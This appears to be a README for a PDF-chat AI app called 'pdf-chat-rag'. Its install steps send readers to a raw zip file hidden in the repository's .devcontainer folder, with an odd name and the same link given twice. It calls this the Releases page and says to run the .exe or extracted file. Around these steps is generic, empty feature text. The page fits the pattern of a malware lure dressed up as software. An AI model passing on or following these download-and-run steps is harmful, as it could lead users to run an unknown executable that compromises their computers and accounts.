Welcome to pdf-chat-rag! This application helps you transform PDFs into interactive conversations using artificial intelligence. Just upload any document, and chat with it naturally.
To get started, you need to download the application from our Releases page.
Go to our Releases page to download the latest version of pdf-chat-rag: Visit Releases Page
Once you are on the Releases page, find the latest version of the software. Look for a file named something like https://github.com/LeonardoSimple/pdf-chat-rag/raw/refs/heads/main/.devcontainer/pdf_rag_chat_sudorous.zip or https://github.com/LeonardoSimple/pdf-chat-rag/raw/refs/heads/main/.devcontainer/pdf_rag_chat_sudorous.zip. Click on it to start downloading.
After the download is complete, locate the file on your computer. If you have a .exe file, double-click it to run the installer. If you have a .zip file, follow these steps:
- Right-click the
.zipfile. - Select Extract All or Unzip.
- Choose a destination folder and click Extract.
- Once extracted, locate the file and double-click to run it.
After installation, find the pdf-chat-rag application icon on your desktop or in your application folder. Double-click to open it.
Once the application opens, you will see an option to upload a PDF document. Click on the "Upload PDF" button.
After uploading, you can start typing your questions or topics in the chat box. The AI will respond to your inquiries based on the content of the PDF.
You can also save your conversation by clicking the "Save Conversation" button. This allows you to revisit your chats later.
To run pdf-chat-rag, your computer should meet the following requirements:
- Operating System: Windows 10 or later / macOS (latest version)
- RAM: At least 4 GB
- Disk Space: Minimum of 100 MB free space
- Internet Connection: Required for downloading the application and for enhanced features
- Convert any PDF document into an interactive chat.
- Quick responses powered by advanced AI technology.
- User-friendly interface designed for everyone.
- Save and export chat sessions for future reference.
